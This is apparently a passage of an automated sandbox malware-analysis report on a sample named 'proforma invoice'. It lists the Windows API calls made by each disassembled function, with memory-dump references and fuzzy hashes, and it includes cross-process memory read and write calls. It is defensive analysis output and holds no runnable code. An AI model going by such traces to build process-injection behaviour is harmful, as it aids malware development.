                    • Part of subcall function 00AD3820: RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00ADCE0F
                  • _free.LIBCMT ref: 00ADCE22
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00ADCE31
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                  • String ID:
                  • API String ID: 336800556-0
                  • Opcode ID: eb50f625e7fc53623fcbb6f430161bb3c5d599feee09d55b4c22a02621933ad4
                  • Instruction ID: 780b3add48663028d4156d4b469affb18eed32ff39e2b15d8dcd8afcdcb705c9
                  • Opcode Fuzzy Hash: eb50f625e7fc53623fcbb6f430161bb3c5d599feee09d55b4c22a02621933ad4
                  • Instruction Fuzzy Hash: B10175B26016167F672117BA6C48D7FBE6DEEC6BB1365012AF906D7301EE618D01D2B0
                  APIs
                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AB9693
                  • SelectObject.GDI32(?,00000000), ref: 00AB96A2
                  • BeginPath.GDI32(?), ref: 00AB96B9
                  • SelectObject.GDI32(?,00000000), ref: 00AB96E2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ObjectSelect$BeginCreatePath
                  • String ID:
                  • API String ID: 3225163088-0
                  • Opcode ID: 4e94147e625b4881742c937bc6f1e5ab280f5de0b8f709f0d68e1d4f61b2d56a
                  • Instruction ID: b2708fd143ff2b435a4286620f2ab2284bb2e88d75b7a971d7cf876d4e1a6b3b
                  • Opcode Fuzzy Hash: 4e94147e625b4881742c937bc6f1e5ab280f5de0b8f709f0d68e1d4f61b2d56a
                  • Instruction Fuzzy Hash: E3217F31802305EBDB119F6CDC29BEE7BB8BB10315F100616F619A71B2DB705893CBA0
                  APIs
                  • GetSysColor.USER32(00000008), ref: 00AB98CC
                  • SetTextColor.GDI32(?,?), ref: 00AB98D6
                  • SetBkMode.GDI32(?,00000001), ref: 00AB98E9
                  • GetStockObject.GDI32(00000005), ref: 00AB98F1
                  • GetWindowLongW.USER32(?,000000EB), ref: 00AB9952
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Color$LongModeObjectStockTextWindow
                  • String ID:
                  • API String ID: 1860813098-0
                  • Opcode ID: 4308b22a024f02154323d69ca5f3e05c640e3debfa5969d1b5655c41c23cab7f
                  • Instruction ID: c0caf4516d51bef4544a0e8878768d0a789a328dcefab351536017d8a3383a18
                  • Opcode Fuzzy Hash: 4308b22a024f02154323d69ca5f3e05c640e3debfa5969d1b5655c41c23cab7f
                  • Instruction Fuzzy Hash: E111C832146250AFCB128FA5EC5AEEF3F78EB127117140559F642AB5B3CB254991CB50
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _memcmp
                  • String ID:
                  • API String ID: 2931989736-0
                  • Opcode ID: f0fbc94c84a3734daa93cd540428509f4e84a93067815a17c7e37d5c86f415fd
                  • Instruction ID: 87bae541a8ebc7637d4a5f31b36627881209ab9ec1b12b4a5a6d738730a52d2d
                  • Opcode Fuzzy Hash: f0fbc94c84a3734daa93cd540428509f4e84a93067815a17c7e37d5c86f415fd
                  • Instruction Fuzzy Hash: 0701B9B5781605BBD72855109F82FBB77DCEF21398F504064FD049EAC2F760ED1096A1
                  APIs
                  • GetLastError.KERNEL32(?,?,?,00ACF2DE,00AD3863,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6), ref: 00AD2DFD
                  • _free.LIBCMT ref: 00AD2E32
                  • _free.LIBCMT ref: 00AD2E59
                  • SetLastError.KERNEL32(00000000,00AA1129), ref: 00AD2E66
                  • SetLastError.KERNEL32(00000000,00AA1129), ref: 00AD2E6F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorLast$_free
                  • String ID:
                  • API String ID: 3170660625-0
                  • Opcode ID: 36a6535faa40116864035dfc5eb8ee8f891eaea7f181f35d5d8ece0cfbf341a6
                  • Instruction ID: 4a873a25afaffa9ac63104b05ff901ae621a273e1840b2b9573aeaca78779587
                  • Opcode Fuzzy Hash: 36a6535faa40116864035dfc5eb8ee8f891eaea7f181f35d5d8ece0cfbf341a6
                  • Instruction Fuzzy Hash: 0C01D1366056006B872227756D45F2B3F69ABF13A2B34442BF837A33D2EEB48801C320
                  APIs
                  • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?,?,00B0035E), ref: 00B0002B
                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?), ref: 00B00046
                  • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?), ref: 00B00054
                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?), ref: 00B00064
                  • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?), ref: 00B00070
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: From$Prog$FreeStringTasklstrcmpi
                  • String ID:
                  • API String ID: 3897988419-0
                  • Opcode ID: c016179a1144cd78d640625da959e6f06c7534a1668aec7cc22abde97fc01f2d
                  • Instruction ID: d3a6a4bc0615d47e2d44f304dfdd2e17540f9929222137d3eef90a1755d06f40
                  • Opcode Fuzzy Hash: c016179a1144cd78d640625da959e6f06c7534a1668aec7cc22abde97fc01f2d
                  • Instruction Fuzzy Hash: BE01A276610208BFDB115FA8DC48BAE7EEDEF44751F248164F905E3250EB71DE408BA0
                  APIs
                  • QueryPerformanceCounter.KERNEL32(?), ref: 00B0E997
                  • QueryPerformanceFrequency.KERNEL32(?), ref: 00B0E9A5
                  • Sleep.KERNEL32(00000000), ref: 00B0E9AD
                  • QueryPerformanceCounter.KERNEL32(?), ref: 00B0E9B7
                  • Sleep.KERNEL32 ref: 00B0E9F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: PerformanceQuery$CounterSleep$Frequency
                  • String ID:
                  • API String ID: 2833360925-0
                  • Opcode ID: 639467a793eff54dcff6f2137b3f0bc9ab832519d36d9d190d6ea1b199c6c9af
                  • Instruction ID: 4b11a12d4bd0cb563405a2a3524470e6305aa1515887d60a9929813a957728ab
                  • Opcode Fuzzy Hash: 639467a793eff54dcff6f2137b3f0bc9ab832519d36d9d190d6ea1b199c6c9af
                  • Instruction Fuzzy Hash: 4A011731C01A29DBCF00ABE5DD59AEDBFB8FB09701F100996E512B2291CF309654DBA1
                  APIs
                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B01114
                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01120
                  • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B0112F
                  • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01136
                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B0114D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                  • String ID:
                  • API String ID: 842720411-0
                  • Opcode ID: 87c662245a051cb078a1a5602809ce1cd84daf1fafa677aa46f8ffa075d592a6
                  • Instruction ID: 1771060a834e1b86af07300fcfd135225a71c7b6266757d47b3247147b4ec232
                  • Opcode Fuzzy Hash: 87c662245a051cb078a1a5602809ce1cd84daf1fafa677aa46f8ffa075d592a6
                  • Instruction Fuzzy Hash: 45011979200615FFDB154FA9DC49A6A3FAEEF893A0B204459FA45E73A0DE31DC009B60
                  APIs
                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B00FCA
                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B00FD6
                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B00FE5
                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B00FEC
                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B01002
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: HeapInformationToken$AllocErrorLastProcess
                  • String ID:
                  • API String ID: 44706859-0
                  • Opcode ID: 857c5f7680773c4d9e13ebe345748454a2469bc80579a48e5086d94e3ff1a02a
                  • Instruction ID: 4ab8a7ab56a51bd17df94bdefefcd5c6a5594f806dbfb128eb91ade97e0ee0cf
                  • Opcode Fuzzy Hash: 857c5f7680773c4d9e13ebe345748454a2469bc80579a48e5086d94e3ff1a02a
                  • Instruction Fuzzy Hash: 37F04939200301BBDB264FA89C49F5A3FADEF89762F204854FA85E7291DE70DC508B60
                  APIs
                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B0102A
                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B01036
                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B01045
                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B0104C
                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B01062
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: HeapInformationToken$AllocErrorLastProcess
                  • String ID:
                  • API String ID: 44706859-0
                  • Opcode ID: 08bb8aa7c873bb9854415df66526cfde67cde419e0fde532cf847aed6fc3e649
                  • Instruction ID: 035601ad5c0324475d5dddc260bb1325bfbead68cabaf4d2844b1e1ed01c305c
                  • Opcode Fuzzy Hash: 08bb8aa7c873bb9854415df66526cfde67cde419e0fde532cf847aed6fc3e649
                  • Instruction Fuzzy Hash: 29F04939200301BFDB255FA8EC49F5A3FADEF89761F200814FA85E7290DE70D8508B60
                  APIs
                  • CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B10324
                  • CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B10331
                  • CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B1033E
                  • CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B1034B
                  • CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B10358
                  • CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B10365
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  • Opcode ID: c39bbd742e3ae23b1bf95113c1bb4ecac39c3d3c45b65a00d675c0f45b8f4512
                  • Instruction ID: 755911c0ae0b95c671ff4a2ab7f0f24ecc9145cfdcabaf408a538f302853cf6f
                  • Opcode Fuzzy Hash: c39bbd742e3ae23b1bf95113c1bb4ecac39c3d3c45b65a00d675c0f45b8f4512
                  • Instruction Fuzzy Hash: E201EE72800B019FCB30AF66E880842FBF9FF643053148A3FD1A252930C3B0A999CF84
                  APIs
                  • _free.LIBCMT ref: 00ADD752
                    • Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
                    • Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0
                  • _free.LIBCMT ref: 00ADD764
                  • _free.LIBCMT ref: 00ADD776
                  • _free.LIBCMT ref: 00ADD788
                  • _free.LIBCMT ref: 00ADD79A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 66ab9a0cfb7402804fd95cd45db0dfa22f41c7409606008875abadeb1b58bbdb
                  • Instruction ID: 5e2360da156aa8fe7c8cb22b05ce717c8d25e723b2d966f529ca27d725ae0947
                  • Opcode Fuzzy Hash: 66ab9a0cfb7402804fd95cd45db0dfa22f41c7409606008875abadeb1b58bbdb
                  • Instruction Fuzzy Hash: D5F03632544204AB8625EB64FAC5D267BDDBB94750B940C47F09EE7781CB74FC80CB64
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 00B05C58
                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00B05C6F
                  • MessageBeep.USER32(00000000), ref: 00B05C87
                  • KillTimer.USER32(?,0000040A), ref: 00B05CA3
                  • EndDialog.USER32(?,00000001), ref: 00B05CBD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                  • String ID:
                  • API String ID: 3741023627-0
                  • Opcode ID: 5120f64f02baf92bd14eeba76f555408d0eed5e682d497b10f36ed77d5376cd4
                  • Instruction ID: f56ff2cfecac37cd53b6cf10396f1a066f08578c0f1d9861d8dbaf757d9b7dc0
                  • Opcode Fuzzy Hash: 5120f64f02baf92bd14eeba76f555408d0eed5e682d497b10f36ed77d5376cd4
                  • Instruction Fuzzy Hash: 9801FB31500B04ABFB315B50DE8EFAA7FA8EB04B45F141599A582A24E1DBB4A9848F90
                  APIs
                  • _free.LIBCMT ref: 00AD22BE
                    • Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
                    • Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0
                  • _free.LIBCMT ref: 00AD22D0
                  • _free.LIBCMT ref: 00AD22E3
                  • _free.LIBCMT ref: 00AD22F4
                  • _free.LIBCMT ref: 00AD2305
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 9ea776ef7fbcaa4476fe2890f9b55b3d590e652b4b784a63a64de2241f9f34fd
                  • Instruction ID: 2ac0a475e415e6c523e48abe5af8690c76f95dda51972fe1eb95c8fb842db39b
                  • Opcode Fuzzy Hash: 9ea776ef7fbcaa4476fe2890f9b55b3d590e652b4b784a63a64de2241f9f34fd
                  • Instruction Fuzzy Hash: C8F03AB18101208F8622BF68BD11A683FA4B778760700094BF41AD73B2CF740891FBA4
                  APIs
                  • EndPath.GDI32(?), ref: 00AB95D4
                  • StrokeAndFillPath.GDI32(?,?,00AF71F7,00000000,?,?,?), ref: 00AB95F0
                  • SelectObject.GDI32(?,00000000), ref: 00AB9603
                  • DeleteObject.GDI32 ref: 00AB9616
                  • StrokePath.GDI32(?), ref: 00AB9631
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Path$ObjectStroke$DeleteFillSelect
                  • String ID:
                  • API String ID: 2625713937-0
                  • Opcode ID: 2a7cefe96edfff1e052ce37b9988dfb2f9db8c254e400dee032d2aed9866e059
                  • Instruction ID: 1ce0757963b7c014628822a71ef7c0e40d138449d236fbe02914cd6b0965b9ed
                  • Opcode Fuzzy Hash: 2a7cefe96edfff1e052ce37b9988dfb2f9db8c254e400dee032d2aed9866e059
                  • Instruction Fuzzy Hash: 78F0B631005644EBDB265FADED187A97F65AB01322F148614E66A660F2CF308997DF20
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: __freea$_free
                  • String ID: a/p$am/pm
                  • API String ID: 3432400110-3206640213
                  APIs
                    • Part of subcall function 00AC0242: EnterCriticalSection.KERNEL32(00B7070C,00B71884,?,?,00AB198B,00B72518,?,?,?,00AA12F9,00000000), ref: 00AC024D
                    • Part of subcall function 00AC0242: LeaveCriticalSection.KERNEL32(00B7070C,?,00AB198B,00B72518,?,?,?,00AA12F9,00000000), ref: 00AC028A
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                    • Part of subcall function 00AC00A3: __onexit.LIBCMT ref: 00AC00A9
                  • __Init_thread_footer.LIBCMT ref: 00B27BFB
                    • Part of subcall function 00AC01F8: EnterCriticalSection.KERNEL32(00B7070C,?,?,00AB8747,00B72514), ref: 00AC0202
                    • Part of subcall function 00AC01F8: LeaveCriticalSection.KERNEL32(00B7070C,?,00AB8747,00B72514), ref: 00AC0235
                  Strings
                  Similarity
                  • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                  • String ID: 5$G$Variable must be of type 'Object'.
                  • API String ID: 535116098-3733170431
                  APIs
                    • Part of subcall function 00B0B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B021D0,?,?,00000034,00000800,?,00000034), ref: 00B0B42D
                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B02760
                    • Part of subcall function 00B0B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B021FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00B0B3F8
                    • Part of subcall function 00B0B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00B0B355
